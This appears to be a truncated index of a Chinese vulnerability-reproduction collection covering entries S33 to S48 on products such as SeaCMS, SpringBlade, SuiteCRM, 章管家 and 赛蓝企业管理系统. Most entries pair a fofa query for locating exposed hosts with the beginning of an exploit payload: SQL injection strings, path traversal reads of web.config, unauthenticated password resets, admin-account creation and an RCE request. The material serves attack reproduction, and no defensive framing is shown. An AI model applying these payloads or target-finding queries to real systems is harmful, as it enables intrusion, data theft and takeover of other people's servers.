S48-1山石网科-应用防火墙-PermissionAC 漏洞描述: 山石网科 Web 应用防火墙(WAF)是专业智能的Web 应用安全防护产品,在Web资产发现、漏洞评估、流量学习、威胁定位等方面全面应用智能分析和语义分析技术,帮助用户轻松应对应用层风险,确保网站全天候的安全运营。在WAF的验证码
S47-1SeaCMS-海洋影视管理系统-SQL 漏洞描述: SeaCMS海洋影视管理系统index.php存在SQL注入漏洞,攻击者可获取数据库敏感数据。 fofa语法: app=“海洋CMS” 漏洞复现: payload: POST /js/player/dmplayer/dmku/index.
S46-1深圳智互联科技有限公司-SRM智联云采系统-任意文件读取 漏洞描述: 智互联(深圳)科技有限公司SRM智联云采系统download存在任意文件读取漏洞 fofa语法: title==“SRM 2.0” 漏洞复现: payload: GET /adpweb/static/%2e%2e;/a/
S45-1苏州梓川信息科技有限公司-PEPM-RCE 漏洞描述: PEPM系统存在远程代码执行漏洞,Cookie的auth字段存在反序列化漏洞,攻击者可构造反序列化链生成恶意数据,执行任意PHP代码。 影响版本: PEPM < V6.7.3.20240507.Release fofa语法: head
S44-3上海建业信息科技股份-章管家-PermissionAC 漏洞复现: 任意账号密码重置漏洞 payload: POST /app/updatePwd.htm HTTP/1.1 Host: User-Agent: python-requests/2.31.0 Accept-Encoding:
S44-2上海建业信息科技股份-章管家-SQL 漏洞复现: POC1 payload: POST /app/message/listUploadIntelligent.htm?token=dingtalk_token&person_id=1&unit_id=1 HTTP/1.1 Host:127.0
S44-1上海建业信息科技股份-章管家-PermissionAC 漏洞描述: 章管家 /api/personSeal_jdy/saveUser.htm 接口处存在任意用户创建漏洞,未经身份验证的远程攻击者可以利用此漏洞创建管理员账户,从而接管系统后台,造成信息泄露,导致系统处于极不安全的状态。 fo
S43-1赛蓝-企业管理系统 -PermissionAC 漏洞描述: 赛蓝企业管理系统 AuthToken/Index 接口存在身份认证绕过漏洞,未授权的远程攻击者可以利用此接口构造token绕过身份认证,使用超级管理员账户登录系统后台,造成信息泄露或者恶意破坏,使系统处于极不安全的状态。 fofa
S41-1SpringBlade-后台框架-SQL fofa语法: body=“https://bladex.vip” 漏洞复现: payload: GET /api/blade-system/menu/list?updatexml(1,concat(0x7e,md5(1),0x7e),1)=1 H
S39-1SuiteCRM-SQL 漏洞复现: payload: GET /index.php?entryPoint=responseEntryPoint&event=1&delegate=a<"+UNION+SELECT+SLEEP(5);--+-&type=c&response=accept H
S40-1Sharp-多功能打印机-PermissionAC 漏洞复现: payload: /installed_emanual_list.html 效果图:
S38-3赛蓝-企业管理系统-SQL 漏洞复现: payload: GET /BaseModule/ExcelImport/GetImportDetailJson?ImportId=1%27+UNION+ALL+SELECT+NULL%2CNULL%2CNULL%2CNULL%2CCHAR%2811
S38-2赛蓝-企业管理系统-任意文件读取 漏洞复现: payload: GET /Utility/GetJSFile?filePath=/web.config HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
S38-1赛蓝-企业管理系统-任意文件读取 漏洞复现: payload: GET /BaseModule/ReportManage/DownloadBuilder?filename=//web.config HTTP/1.1 Host: your-ip User-Agent: Mozilla/5.0
S37-1数字通指尖云平台-智慧政务payslip-SQL 漏洞复现: payload: GET /payslip/search/index/userid/time/time?PayslipUser[user_id]=SELECT 4050 FROM(SELECT COUNT(*),CONCAT((
S36-1上讯-信息InforCube运维审计系统-RCE 网站图片: fofa语法 body=“default/getloginhtml” 漏洞复现: payload: POST /emailapply/RepeatSend HTTP/1.1 Content-Type: application/x
S35-1叁体-佳会视频会议-任意文件读取 漏洞描述: 叁体-佳会视频会议 attachment 接口处存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。 影响版本: version <= 3.9.
S34-1山东聚恒-聚恒中台系统-SQL 漏洞描述: 聚恒中台系统 data.ashx 接口处存在SQL注入漏洞,未经身份验证的恶意攻击者利用 SQL 注入漏洞获取数据库中的信息(例如管理员后台密码、站点用户个人信息)之外,攻击者甚至可以在高权限下向服务器写入命令,进一步获取服务器系统权限。 网站图
S33-1SpringBlade-分布式微服务架构-SQL 漏洞描述: SpringBlade 后台框架 /api/blade-system/tenant/list 路径存在SQL注入漏洞,攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在